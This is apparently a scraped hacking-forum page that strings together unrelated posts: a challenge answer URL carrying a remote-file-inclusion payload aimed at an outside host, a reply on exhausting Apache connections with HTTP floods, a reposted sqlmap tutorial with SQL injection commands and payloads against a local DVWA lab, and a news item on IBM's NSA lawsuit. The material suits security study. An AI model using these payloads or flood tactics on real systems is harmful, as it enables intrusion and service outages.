Leaderboard

http://florin-darck.3owl.com/challenge/hackyard.php?x=ttp://worm32.esy.es/worm32 P.S.Challange rezolvat dupa 3 pahare de jack cu redbull.

Pai si ala ce e frate, nu e REQUEST HTTP ? Nu vreau sa te jignesc, dar aplicatia da nu are nicio legatura cu un atac ddos. In primul rand, designul lasa de dorit. (design-> nu ma refer la aspectul lui, ci la alt nivel) Argumente: - Intr-un atac, trimiti pachete sau request-uri fara sa te intereseze de raspuns. Caz in care nu vad de ce ai folosi un browser web. - Ai afirmat ca se trimit "LA RAND" cate 8 request-uri per proxy. Lucrul asta nu face nimic, aplicatia va genera un singur thread, lucru ce nu poate pica nici un web server instalat pe telefon. Nu te intereseaza sa faci 8-10-20 request-uri per proxy la rand, te intereseaza sa deschida cat mai multe conexiuni persistente catre web server. Cele mai comune servere web de la httpd sunt (dupa model): - Apache MPM Prefork - Apache MPM Worker Primul, adica Prefork va deschide cate un proces pentru fiecare utilizator online. Daca deschizi 1000 de conexiuni in el, sistemul va crapa pentru ca nu exista memorie suficienta sau limita maxima (default 256) a fost atinsa. Prefork consuma in jur de 16-40 MB memorie per process (in cazul in care php este incarcat ca dinamic shared object (adica rezident in process) - DSO/mod_php). Al II-lea model, Worker este un model threaded-safe (multi thread). Un singur process apache poate sustine si 5000 de conexiuni. Deci, inca odata, aplicatia ta la ce este utila si ce anume face ? (epuizeaza numarul maxim de conexiuni acceptat de web server, are ca tinta epuizarea resurselor, sau ?!) Nota: am adus in discutie apache web server pentru ca este cel mai utilizat. Daca punem problema nginx-ului sau altor web servere lightweight sau event based, pur si simplu nu ai ce le face prin http flood. (cel putin nu la nivelul asta) De preferat cand faci un tool de genul este sa cunosti cum functioneaza un webserver (in afara de faptul ca are port 80 open) PS: replica vine in urma: Daca vreti discutii de genul, putem deschide un thread dedicat despre asta.

Zatarra scuze ca iti stric afacerea Il inchidem si il mutam la cos.

Sqlmap Tricks for Advanced SQL Injection Sqlmap is an awesome tool that automates SQL Injection discovery and exploitation processes. I normally use it for exploitation only because I prefer manual detection in order to avoid stressing the web server or being blocked by IPS/WAF devices. Below I provide a basic overview of sqlmap and some configuration tweaks for finding trickier injection points. Basics Using sqlmap for classic SQLi is very straightforward: ./sqlmap.py -u 'http://mywebsite.com/page.php?vulnparam=hello' The target URL after the -u option includes a parameter vulnerable to SQLi (vulnparam). Sqlmap will run a series of tests and detect it very quickly. You can also explicitly tell sqlmap to only test specific parameters with the -p option. This is useful when the query contains various parameters, and you don't want sqlmap to test everyting. You can use the --data option to pass any POST parameters. To maximize successful detection and exploitation, I usually use the --headers option to pass a valid User-Agent header (from my browser for example). Finally, the --cookie option is used to specify any useful Cookie along with the queries (e.g. Session Cookie). Advanced Attack Sometimes sqlmap cannot find tricky injection points and some configuration tweaks are needed. In this example, I will use the Damn Vulnerable Web App (DVWA - Damn Vulnerable Web Application), a deliberately insecure web application used for educational purposes. It uses PHP and a MySQL database. I also customized the source code to simulate a complex injection point. Here is the source of the php file responsible for the Blind SQL Injection exercise located at /[install_dir]/dvwa/vulnerabilities/sqli_blind/source/low.php: [phpcode]<?php if (isset($_GET['Submit'])) { // Retrieve data $id = $_GET['id']; if (!preg_match('/-BR$/', $id)) $html .= '<pre><h2>Wrong ID format</h2></pre>'; else { $id = str_replace("-BR", "", $id); $getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id'"; $result = mysql_query($getid); // Removed 'or die' to suppress mysql errors $num = @mysql_numrows($result); // The '@' character suppresses errors making the injection 'blind' if ($num > 0) $html .= '<pre><h2>User exists!</h2></pre>'; else $html .= '<pre><h2>Unknown user!</h2></pre>'; } } ?>[/phpcode] Basically, this code will receive an ID compounded of a numerical value followed by the string "-BR". The application will first validate whether this string is present and will extract the numerical value. Then, it concatenates this value to the SQL query used to check if it is a valid user ID and returns the result ("User exists!”or “Unknown user!"): This page is clearly vulnerable to SQL Injection but due to the string manipulation routine before the actual SQL command, sqlmap is unable to find it: ./sqlmap.py --headers="User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:25.0) Gecko/20100101 Firefox/25.0" --cookie="security=low; PHPSESSID=oikbs8qcic2omf5gnd09kihsm7" -u 'http://localhost/dvwa/vulnerabilities/sqli_blind/?id=1-BR&Submit=Submit#' --level=5 risk=3 -p id I’m using a valid User-Agent and an authenticated Session Cookie. I’m also forcing sqlmap to test the “id” parameter with the -p option. Even when I set the level and risk of tests to their maximum, sqlmap is not able to find it: To pass the validation and successfully exploit this SQLi, we must inject our payload between the numerical value and the "-BR" suffix. This is a typical Blind SQL Injection instance and I’m lazy, so I don’t want to exploit it manually. For more information about this kind of SQLi, please check this link: https://www.owasp.org/index.php/Blind_SQL_Injection. http://localhost/dvwa/vulnerabilities/sqli_blind/?id=1%27+AND+1=1+%23-BR&Submit=Submit# http://localhost/dvwa/vulnerabilities/sqli_blind/?id=1%27+AND+1=0+%23-BR&Submit=Submit# Note that we are URL-encoding special characters because the parameter is located in the URL. The decoded string is: id=1' AND 1=1 #-BR Sqlmap Tweaking How to force sqlmap to inject there? Well, the first idea is to use the --suffix option with the value "-BR" and set "id=1" in the query. It will force sqlmap to add this value after every query. Let’s try it with debug information (-v3 option): ./sqlmap.py --headers="User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:25.0) Gecko/20100101 Firefox/25.0" --cookie="security=low; PHPSESSID=oikbs8qcic2omf5gnd09kihsm7" -u 'http://localhost/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#' --level=5 risk=3 -p id --suffix="-BR" -v3 I'm still not having any luck. To check what’s going on, we can increase the debug level or set the --proxy=”http://localhost:8080” option to point to your favorite web proxy. It appears sqlmap does not add comments when a suffix is passed to the command line. So every query looks like this: id=1’ AND 1=0 -BR. Obviously, it is not working. Below is how you should handle this situation. The file located at "sqlmap/xml/payloads.xml" contains all the tests sqlmap will perform. It is an XML file and you can add your proper tests to it. As this is a boolean-based blind SQLi instance, I am using the test called "AND boolean-based blind - WHERE or HAVING clause (MySQL comment)" as a template and modifying it. Here is my new test I added to my payload.xml file: Existing user ID: Non-existing user ID: A valid query (True): A non-valid query (False): <test> <title>AND boolean-based blind - WHERE or HAVING clause (Forced MySQL comment)</title> <stype>1</stype> <level>1</level> <risk>1</risk> <clause>1</clause> <where>1</where> <vector>AND [INFERENCE] #</vector> <request> <payload>AND [RANDNUM]=[RANDNUM] #</payload> </request> <response> <comparison>AND [RANDNUM]=[RANDNUM1] #</comparison> </response> <details> <dbms>MySQL</dbms> </details> </test> This test simply forces the use of the # character (MySQL comment) in every payload. The original test was using the <comment> tag as a sub-tag of the <request> tag. As we saw, it is not working with suffixes. Now we explicitly want this special character included at the end of every request, before the "-BR" suffix. A detailed description of the available options is included in the payload.xml file, but here is a summary of the settings I used: <title>: the title… duh. <stype>: type of test, 1 means boolean-based blind SQL injection. <level>: level of this test, set to 1 (can be set to anything you want as long as you set the right --level option in the command line). <risk>: risk of this test (like the <level> tag, can be set to anything you want as long as you set the right --risk option in the command line). <clause>: in which clause this will work, 1 means WHERE or HAVING clauses. <where>: where to insert the payload, 1 means appending the payload to the parameter original value. <vector>: the payload used for exploitation and also used to check if the injection point is a false positive. <request>: the payload that will be injected and should trigger a True condition (e.g. ' AND 1=1 #). Here the sub-tag <payload> has to be used. <response>: the payload that will be injected and should trigger a False condition (e.g. ' AND 1=0 #). Here the sub-tag <comparison> has to be used. <details>: set the database in used: MySQL. Here the sub-tag <dbms> has to be used. Let's see if this works: Great! Now we can easily exploit this with sqlmap. sqlmap is a very powerful tool and highly customizable, I really recommend it if you’re not already using it. It can save you a lot of time during a penetration test. Posted by Christophe De La Fuente on 30 December 2013 Sursa: Sqlmap Tricks for Advanced SQL Injection - SpiderLabs Anterior

It seems as if those business which bowed down in front of NSA are now facing a backlash. That’s what we can see from several tech giants and business institutions who cooperated with the American National Security Agency (NSA) for its spying and surveillance project PRISM. These companies are now loosing billions of dollars and most importantly the trust of their customer for invading privacy. Bloomberg Law - Document - Louisiana Sheriff's Pension & Relief Fund v. International Business Machines Corporation et al, Docket No. 1:13-cv-08818 (S.D.N.Y. Dec 12, 2013), Court Docket One among those company is multinational technology and consulting corporation IBM, which has been sued and facing a massive lawsuit by its own shareholder for its collaboration with the NSA. The shareholder claims that by cooperating with NSA, IBM has abused federal securities laws to hide its looses. BusinessWeek reports that the shareholder filed a complaint on Thursday in a federal district court in Manhattan where the Louisiana Sheriffs’ Pension and Relief Fund claims IBM defrauded investors by allegedly concealing a decline in hardware sales in China following reports in the Guardian about the NSA program: Spying is not good for business. That’s been the message from many U.S. tech companies and industry groups in recent months following revelations last summer that several companies were cooperating with the National Security Agency over its Prism surveillance program. The industry says it stands to lose tens of billions of dollars as customers in other countries turn to homegrown technology instead. Now one such company, IBM (IBM), is facing a lawsuit over its cooperation with the NSA. IBM was sued yesterday by a shareholder claiming it violated federal securities laws in seeking to hide losses that stemmed from disclosures of its relationship with the NSA. In a complaint filed in federal district court in Manhattan on Thursday, the Louisiana Sheriffs’ Pension and Relief Fund claims IBM defrauded investors by allegedly concealing a decline in hardware sales in China following reports in the Guardian about the NSA program. STORY: IBM Faces a Crisis In the Cloud the complaint states. The plaintiff alleges that IBM lobbied in favor of Cispa, a bill that would allow it to share customers’ personal data, including data from customers in China. IBM’s cooperation with the NSA presented a “material risk” to the company’s sales, especially in China for its Systems and Technology hardware division, the pension fund says in the complaint. STORY: U.S. Tech Giants May Pay the Price, as Europe Seethes Over NSA Snooping IBM reported in the Guardian a 22 percent drop in sales in China compared with the previous quarter as a result of disclosures about its relationship with the NSA last summer, the complaint says. The lawsuit—brought as a class action representing all IBM shareholders who purchased common stock from June 25 to Oct. 16 of this year—is seeking compensatory damages for losses sustained as a result of IBM’s alleged wrongdoing, as well as lawyers’ fees and expenses, and other injunctive relief the court deems appropriate. IBM spokesman Doug Shelton wrote in an e-mail: However, IBM is not the first company to face lawsuit. Just a couple of days ago, a British citizen had sued Microsoft for cooperating with the NSA and providing personal details for PRISM project: A UK citizen has sued Microsoft for leaking Prism private data to the NSA – HackRead – Latest Cyber Crime – Information Security – Hacking News SURSE: IBM Shareholder Sues the Company Over NSA Cooperation - Businessweek IBM Sued by Its Own Shareholder for Cooperating with the NSA – HackRead – Latest Cyber Crime – Information Security – Hacking News

Fixed. Scripts updated. If something is not working please let me know!